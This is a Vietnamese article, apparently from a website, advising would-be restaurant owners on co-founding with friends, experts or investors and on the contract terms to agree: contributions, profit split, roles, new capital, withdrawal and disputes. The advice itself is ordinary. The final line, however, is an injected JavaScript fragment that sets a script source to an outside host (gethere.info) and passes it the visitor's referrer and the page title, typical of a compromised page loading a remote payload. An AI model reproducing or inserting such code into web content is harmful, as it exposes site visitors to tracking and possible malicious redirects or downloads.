Nhiều ứng viên kinh doanh muốn tham gia vào lĩnh vực nhà hàng, song, vì một lý do nào đó còn đắn đó, do vốn khởi điểm không có nhiều hoặc không tự tin với một môi trường kinh doanh mới; bạn cần có một số người cộng sự, một số nhà đồng sáng lập để hỗ trợ, san sẻ khó khăn cùng bạn. Hình thức này khá phổ biến ở Việt Nam nhưng không phải ai cũng nắm rõ những quy định làm việc, hợp tác rắc rối bên trong đó.
Nhà đồng sáng lập là người cùng sở hữu, cùng góp vốn chung với bạn và có thể đa dạng thành phần hợp tác; không giới hạn. Tuy nhiên, cũng có một số mô hình cơ bản sau:
Chung vốn cùng bạn bè
Chung vốn cùng bạn bè là hình thức hợp tác phổ biến nhất; đơn giản vì bạn bè là những người hiểu nhau, cùng chung chí hướng và cũng dễ nói chuyện hơn. Họ chắc chắn phải nhiệt tình ủng hộ dự án kinh doanh của bạn và cảm thấy hào hứng với nó; cùng đóng góp tiền, sức và trí vào dự án này. Song bạn cũng cần lưu ý khi hợp tác cùng bạn bè, vì đến một giai đoạn nào đó, người ta vẫn hay ví là qua giai đoạn kinh doanh đầu là “kì trăng mật”, họ có thể thoái thác hoặc trì trệ trong công việc; trong trường hợp đó, bạn cũng khó mà nhắc nhở được, sợ mất lòng bạn bè. Hơn nữa, nếu cùng trên cương vị quản lý nhà hàng, ở vị trí ngang tầm nhau, nếu xảy ra mâu thuẫn thì rất khó để giải quyết và giữ được mối quan hệ tốt đẹp. Nhiều trường hợp làm ăn chung vốn rồi mất bạn.
Người chung vốn với bạn là một chuyên gia trong lĩnh vực nào đó
Một số người có lợi thế trong lĩnh vực nào đó, là người có chuyên môn nhất định như bếp trưởng, marketing, kế toán,…Đương nhiên, cùng với những kiến thức, lợi thế này, họ có thể giúp bạn quản lý nhà hàng của mình, theo một khía cạnh nào đó; đồng thời, bản thân bạn cũng sẽ tích lũy được nhiều kinh nghiệm cho bản thân trong quá trình làm việc chung. Tuy nhiên, đừng quá chủ quan hay lơ đãng, bạn sẽ dễ bị phụ thuộc vào họ khi giao phó toàn bộ công việc hay những vị trí quan trọng mà không hề có bất cứ sự kiểm soát nào.
Đối tác là người cầm cân nảy mực
Mức độ huy động vốn sẽ tăng lên theo quy mô kinh doanh nhà hàng. Bạn có thể đang có một ý tưởng kinh doanh tốt, một kế hoạch chi tiết cực kỳ hoàn hảo; thế nhưng cái bạn thiếu lại là nguồn vốn. Bạn cần tìm đến những nhà đầu tư; song với mô hình kinh doanh kiểu này, người đồng sáng lập nắm giữ số vốn lớn hơn nên họ dễ lấn át bạn trong nhiều quyết định; đương nhiên doanh thu chia cuối kỳ sẽ ưu tiên cho người nắm giữ cổ phần lớn hơn và một số quyền lợi khác.
Bên lợi bên hại, bên nào nặng hơn?
Trong kiểu mô hình kinh doanh này, khó mà có thể đưa ra nhận định xem ai lợi hơn, ai thiệt hơn. Khi có nhiều thành viên cùng góp vốn kinh doanh nhà hàng thì nguồn tài chính được ổn định hơn. Giảm thiểu rủi ro khi việc kinh doanh bị đình trệ. Thế mạnh của từng thành viên sẽ hỗ trợ nhau, tạo nên một tổng thể hoàn chỉnh. Bên cạnh đó, lợi thế của các nhà hàng có nhiều thành viên đồng sở hữu là khả năng nhìn thấy nhiều phương diện của một vấn đề, các đề suất giải quyết vấn đề đa dạng hơn.
Vấn đề nào cũng có hai mặt, việc của bạn là phát huy ưu điểm và hạn chế nhược điểm. Bạn hãy nên nhớ rằng mình đang kinh doanh nhà hàng, một thương trường rất phức tạp. Nên dù trong bất kì trường hợp nào hãy cố gắng cụ thể, rành mạch hoá vấn đề. Một bản hợp đồng với những điều khoản chi tiết sẽ giúp bạn hạn chế những rắc rối sau này. Khi lập giao kết hợp tác kinh doanh cần chú trọng các chủ điểm sau:
# Đóng góp của các bên
Nhận đóng góp có thể dưới hình thức là tiền mặt, tài sản cố định hoặc danh tiếng của người góp vốn (đây là một lợi thế lớn mà không phải nhà hàng nào cũng có được và đương nhiên nó không được đo bằng giá trị tiền cụ thể). Bạn nên xác định rõ việc đóng góp của mỗi thành viên trước khi kinh doanh kì mới.
# Tỷ lệ phân chia lợi nhuận (lỗ hoặc lãi)
Một trong những phương pháp chia lợi nhuận đơn giản nhất là chia đều theo số người. Đó là những người có mối quan hệ thân tình với bạn như bạn bè, người thân,…Tuy nhiên, nếu có quá nhiều đối tác kinh doanh theo tỉ lệ góp vốn chênh lệch, bạn cũng cần cân đo đong đếm sao cho phù hợp với lợi nhuận cuối kỳ để đảm bảo sự công bằng, tính khách quan và có thể hợp tác làm ăn lâu dài.
# Quyền hạn các bên
Bất kể là mô hình kinh doanh nào cũng cần làm việc trên hợp đồng hợp tác kinh doanh. Trong đó sẽ ghi rõ trách nhiệm của mỗi người, phân chia công việc cụ thể; ai giữ vai trò gì trong việc quản lý nhà hàng. Là người khởi xướng kinh doanh, bạn cần nắm rõ thế mạnh, sở trường của mỗi đồng sáng lập viên để thỏa thuận công việc cho phù hợp. Nên nhớ đừng vì tự ti thiếu vốn, thiếu kinh nghiệm mà vội vàng trao vị trí đó cho người khác.
# Mở rộng quy mô góp vốn
Khi kinh doanh nhà hàng thuận lợi, bạn có nhu cầu mở rộng quy mô trong khi đóng góp của nhưng nhà đồng sở hữu không thể đáp ứng, hay khi việc làm ăn gặp khó khăn, bạn nên kiếm tìm những đối tác mới có lợi thế về tài chính và kinh nghiệm kinh doanh nhà hàng. Do đó bạn nên ghi chú trong hợp đồng với các thành viên hiện tại về trường hợp này. Số lượng thành viên có thể tham gia sau này, điều kiện tham gia, số vón góp của họ, quyền lợi, trách nhiệm,… Đây cũng là một quy định hữu hiệu nhằm ngăn chặn thành viên nào đó có ý định thâu tóm nhà hàng.
# Rút vốn
Kinh doanh nhà hàng là lĩnh vực khó dự báo trước và có nguy cơ thất bại tương đối cao; đương nhiên, chẳng ai muốn kinh doanh thua lỗ rồi ôm một cục nợ cả và việc họ rút vốn là điều tất yếu, bạn cũng cần xác định trước khi quyết định nhận thêm người mới. Hãy quy định cụ thể, chặt chẽ về việc rút vốn, về thời gian rút vốn cần thông báo tối thiểu trước đó bao nhiêu ngày để bạn cùng các đồng sáng lập viên khác có thời gian chuẩn bị.
# Phương pháp giải quyết tranh chấp
Khi đã có những thoả thuận kinh doanh ràng buộc, nhưng mâu thuẫn giữa các bên góp vốn vẫn có thể xảy ra. Một phương pháp đơn giản là biểu quyết dân chủ giữa các đồng sở hữu. Bạn cũng có thể đề xuất phương pháp nhờ bên thứ ba để trung hoà tranh chấp, nhất là khi nhà hàng chỉ có hai người cùng góp vốn. Sau cùng là giải quyết tranh chấp qua toà án. Hãy quy định rõ những trường hợp nào nên áp dụng một trong các phương án trên.
Nếu như bạn không biết về những vấn đề trên, hãy thuê luật sư. Tuy số tiền không nhỏ, nhưng bạn sẽ yên tâm hơn khi kinh doanh nhà hàng. Việc kinh doanh nhà hàng với nhiều người cùng sở hữu sẽ khiến các vấn đề sẽ càng phức tạp hơn. Do đó bạn cần phải lường trước những tình huống có thể xảy ra. Và bạn cần trang bị tốt kiến thức quản lý nhà hàng. Nguồn thông tin bạn có thể dễ dàng tìm kiếm trên mạng, từ các đối thủ, các khoá học quản lý nhà hàng,…
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;